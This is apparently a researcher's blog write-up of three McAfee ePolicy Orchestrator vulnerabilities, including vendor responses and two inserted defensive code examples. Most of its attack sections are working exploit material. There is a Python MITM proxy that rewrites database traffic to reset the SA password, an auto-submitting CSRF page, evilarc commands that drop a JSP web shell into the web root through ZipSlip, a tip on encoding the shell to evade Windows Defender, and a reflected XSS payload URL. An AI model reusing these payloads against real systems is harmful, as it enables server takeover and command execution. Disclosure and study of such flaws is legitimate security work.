
Vulnerability in McAfee epolicy orchestrator

2022-06-23 17:59:00 Khan security team

McAfee ePO is software that helps IT administrators unify the security management of endpoints, networks, data and compliance solutions from McAfee and third parties. McAfee ePO provides flexible automated management functions used to identify, handle and respond to security issues and threats.

Figure: the McAfee ePO login page

My testing found three bugs:

  • A CSRF + SSRF + MITM chain which, if exploited successfully, allows an unauthenticated attacker to execute code remotely on the server
  • Remote code execution by a logged-in user as the result of a ZipSlip attack
  • Reflected XSS

CSRF + SSRF + MITM = command execution

The application contains an area where an administrator can check the availability of a database, which can then be used as the primary data store.

Figure: the "Configure database settings" section

To test the connection, the following request is sent:

POST /core/config HTTP/1.1
Host: epo.test:8443
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 279
Cookie: <cookies>

userAction=test&ajaxMode=nouser&orion.user.security.token=gYyieMaq4W1jNkhK&orion.user.security.token=gYyieMaq4W1jNkhK&db.server.name=127.0.0.1&db.instance.name=&db.port=50781&db.database.name=ePO_TEST&db.param.ssl=request&db.user.name=n1&db.user.domain=TEST

The request contains no protection against CSRF attacks. So far we have a weakness, but it does not affect security by itself, because the request only tests the connection and does not save any rogue settings.

But note how the test connection to the database is established. If the request specifies only the connection host and port, the application uses the current configuration (including the user name, password and database name) to establish a connection to the specified server.
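The two weaknesses just described (no CSRF binding on the test request, and stored credentials being relayed to whatever host the request names) are what a hardened handler for that request would have to check. The following is an added example, not ePO's code: a hypothetical validator for the POST body shown above, assuming the console is served from https://epo.test:8443, that the session stores a per-session CSRF token, and that `stored` holds the currently configured database server.

```python
import hmac
from urllib.parse import parse_qsl, urlsplit

# Assumption (not from the page): the console is only ever served from here.
ALLOWED_ORIGINS = {"https://epo.test:8443"}


def parse_form(body: str) -> dict:
    """Parse a urlencoded body like the /core/config test request.

    A parameter sent twice with different values (the request on the page
    carries the token twice) is rejected instead of silently resolved."""
    form = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        if key in form and form[key] != value:
            raise ValueError(f"conflicting duplicate parameter: {key}")
        form[key] = value
    return form


def validate_config_test(headers: dict, form: dict, session: dict, stored: dict):
    """Checks a hardened test-connection handler would make before connecting.

    Returns (ok, reason). Hypothetical logic, not McAfee's implementation."""
    # 1. The request must come from the console's own origin, not a foreign page.
    origin = headers.get("Origin") or headers.get("Referer")
    if not origin:
        return False, "missing Origin/Referer"
    parts = urlsplit(origin)
    if f"{parts.scheme}://{parts.netloc}" not in ALLOWED_ORIGINS:
        return False, "cross-site origin"
    # 2. The anti-CSRF token must match the one bound to this session.
    token = form.get("orion.user.security.token", "")
    expected = session.get("csrf_token", "")
    if not token or not expected or not hmac.compare_digest(token, expected):
        return False, "invalid or missing CSRF token"
    # 3. Never relay the stored password to a server the admin did not just
    #    supply a password for; this is the SSRF/credential-relay step of the chain.
    target = (form.get("db.server.name", ""), form.get("db.port", ""))
    if target != (stored["server"], stored["port"]) and not form.get("db.user.password"):
        return False, "stored credentials are not reused against a different server"
    return True, "ok"
```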

To demonstrate this and see what the database connection request contains, I wrote a simple Python script. It forwards all incoming requests to another host (the real ePO database) and prints the requests to the screen.

Figure: data passing through the MiTM server

It turned out that, in my case, the vulnerable server authenticated to the database via NTLMSSP and then ran several SQL queries to fetch information.

To exploit the vulnerability we need to modify the queries sent to the database. That is why our MiTM script replaces the string "SET TRANSACTION ISOLATION LEVEL READ COMMITTED" with "ALTER LOGIN [sa] WITH PASSWORD='P@ssw0rd';;;;;". If it works, testing the connection to the database sets the "SA" password to "P@ssw0rd".

import socket

IP = "0.0.0.0"  # IP and port the MiTM server listens on
PORT = 1436
EPO_IP = "1.1.1.1"  # host of the ePO MSSQL database

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

print("[+] Starting MiTM server on port: {}".format(PORT))

server_address = (IP, PORT)
sock.bind(server_address)
sock.listen(1)

server_address2 = (EPO_IP, 50781)  # IP and port of the ePO MSSQL database
sock2.connect(server_address2)

# TDS carries SQL batches as UTF-16LE, hence the interleaved \x00 bytes.
# Both patterns are bytes (not str) so they can be searched in recv() data.
find = b"S\x00E\x00T\x00 \x00T\x00R\x00A\x00N\x00S\x00A\x00C\x00T\x00I\x00O\x00N\x00 \x00I\x00S\x00O\x00L\x00A\x00T\x00I\x00O\x00N\x00 \x00L\x00E\x00V\x00E\x00L\x00 \x00R\x00E\x00A\x00D\x00 \x00C\x00O\x00M\x00M\x00I\x00T\x00T\x00E\x00D"
# Same length as the string it replaces, so the packet length stays unchanged.
replace = b"A\x00L\x00T\x00E\x00R\x00 \x00L\x00O\x00G\x00I\x00N\x00 \x00[\x00s\x00a\x00]\x00 \x00W\x00I\x00T\x00H\x00 \x00P\x00A\x00S\x00S\x00W\x00O\x00R\x00D\x00=\x00'\x00P\x00@\x00s\x00s\x00w\x000\x00r\x00d\x00'\x00;\x00;\x00;\x00;\x00;"

while True:
    connection, client_address = sock.accept()
    try:
        while True:
            data = connection.recv(4096)
            if not data:
                break  # client closed the connection
            if find in data:
                print("[+] Found string in request")
                data = data.replace(find, replace)
            sock2.sendall(data)
            resp = sock2.recv(4096)
            connection.sendall(resp)
    finally:
        connection.close()

To use the whole CSRF + SSRF + MITM chain, we only need to create one HTML page.

<html>
  <body onload="document.getElementById('poc_form').submit()">
    <form action="https://epo.test:8443/core/config" method="POST" id="poc_form">
      <input type="hidden" name="userAction" value="test" />
      <input type="hidden" name="ajaxMode" value="nouser" />
      <input type="hidden" name="db&#46;server&#46;name" value="<MITM_host>" />
      <input type="hidden" name="db&#46;instance&#46;name" value="" />
      <input type="hidden" name="db&#46;port" value="<MITM_port>" />
    </form>
  </body>
</html>

Let's put the bug into action. Run the MITM script, log in to the ePolicy Orchestrator management panel, then open the HTML page we created. If everything is done correctly, we can connect to the database with the credentials SA:P@ssw0rd. The result is as follows:

Figure: executing OS commands through xp_cmdshell

After successfully connecting to the database, we can run any system command.

To sum up, the attack consists of five parts:

  1. The administrator opens the malicious HTML page.
  2. A POST request is sent to /core/config on the administrator's behalf, which makes the target server connect to the MITM server.
  3. The MITM server proxies all traffic to the SQL server (which must be externally accessible) and injects a SQL query that changes the SA user's password.
  4. The attacker connects to the SQL server with the SA user name and the newly set password.
  5. The attacker can now run arbitrary commands on the server.

Vendor response: "McAfee has reviewed the code base, and we believe this issue was already addressed in Cumulative Update (CU) 5, released on November 12, 2019."

Authenticated command execution

I found the next vulnerability in the Software Extensions component (/core/orionNavigationLogin.do#/core/orionTab.do?sectionId=orion.software&tabId=orion.extensions); it is reachable only by authenticated users.

Figure: the "Software Extensions" section

This page prompts you to upload an extension, which must be a ZIP file. I did not know the file structure the application requires to recognize a file as a real extension, so at this point I did not try to upload any malicious extension. But whenever I come across an archive upload function during testing, I always check for the ZipSlip vulnerability.

ZipSlip is a path traversal vulnerability that occurs during decompression when the names of the files inside the archive are not sanitized properly. An attacker can create an archive whose file names contain "../", so that during extraction any file can be written to any directory, or an existing file can be overwritten.

To check for this vulnerability we use evilarc to generate an archive containing the file ../test.txt.

python evilarc.py -d 1 -p '' -o win -f test.zip test.txt

Figure: creating the malicious zip file

Then upload the generated ZIP archive as an extension and try to find the file in the file system.

Figure: location of the extracted file

We can see that the test file ended up in the folder D:\Program Files\McAfee\Server\extensions\tmp\. The web server's root folder is D:\Program Files\McAfee\Server\webapps\ROOT, so now we know the relative path needed to generate an archive containing a web shell (stat.jsp) that ZipSlip will unzip into the server's web root:

python evilarc.py -d 3 -p 'webapps\ROOT\' -o win -f PoC.zip stat.jsp

Figure: creating the malicious zip file with the web shell

When uploading the JSP shell, we Unicode-encoded it so that Windows Defender would not delete it.

Now just upload PoC.zip as an extension and check whether the web shell runs.

Figure: running the "dir" command

As a result, we can run any operating system command.
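The fix for the ZipSlip weakness described in this section is to refuse any archive entry that would resolve outside the extraction directory before extracting, treating backslashes as separators because the archives here are built with `-o win` and land on a Windows server. The following is an added example, not ePO's code, and the archive it inspects is constructed in memory with entry names of the same shape as the ones evilarc produced above; the destination path is a placeholder.

```python
import io
import os
import zipfile


def build_sample_zip() -> bytes:
    """Constructed test archive (not from the page): one benign entry and two
    traversal entries of the shape evilarc produces, with '/' and '\\' separators."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("extension.properties", "name=demo\n")
        zf.writestr("../test.txt", "placeholder\n")
        zf.writestr("..\\..\\..\\webapps\\ROOT\\stat.jsp", "placeholder\n")
    return buf.getvalue()


def is_safe_member(name: str, dest: str) -> bool:
    """True only if the entry would land inside dest after extraction.

    Backslashes count as separators (Windows unzip behaviour); absolute paths,
    drive letters and UNC names are rejected; the resolved path must still sit
    under the destination directory."""
    norm = name.replace("\\", "/")
    if norm.startswith("/") or (len(norm) > 1 and norm[1] == ":"):
        return False
    parts = [p for p in norm.split("/") if p not in ("", ".")]
    if not parts or ".." in parts:
        return False
    dest_real = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(dest_real, *parts))
    return target.startswith(dest_real + os.sep)


def audit_archive(zip_bytes: bytes, dest: str) -> tuple:
    """Split entries into (accepted, rejected) without extracting anything."""
    accepted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            (accepted if is_safe_member(info.filename, dest) else rejected).append(info.filename)
    return accepted, rejected


def safe_extract(zip_bytes: bytes, dest: str) -> list:
    """Refuse the whole archive if any entry escapes dest, otherwise extract.

    CPython's zipfile already strips '..' components on extract; the explicit
    audit is what a server using a naive extractor needs, and it rejects the
    upload instead of silently renaming entries."""
    accepted, rejected = audit_archive(zip_bytes, dest)
    if rejected:
        raise ValueError(f"archive rejected, traversal entries: {rejected}")
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in accepted:
            zf.extract(name, dest)
    return accepted
```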

Vendor response: "We do not consider this an RCE, because ePO administrators can install extensions for their products in the user interface. McAfee currently believes the scenario you describe works as expected when an ePO administrator installs an extension."

Reflected XSS

To exploit it, just open the address /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E; as a proof of concept, you will see a popup containing the document.domain value.

Copyright notice
This article was written by the Khan security team; please include the original link when reposting. Thank you.
https://yzsam.com/2022/01/202201041226461786.html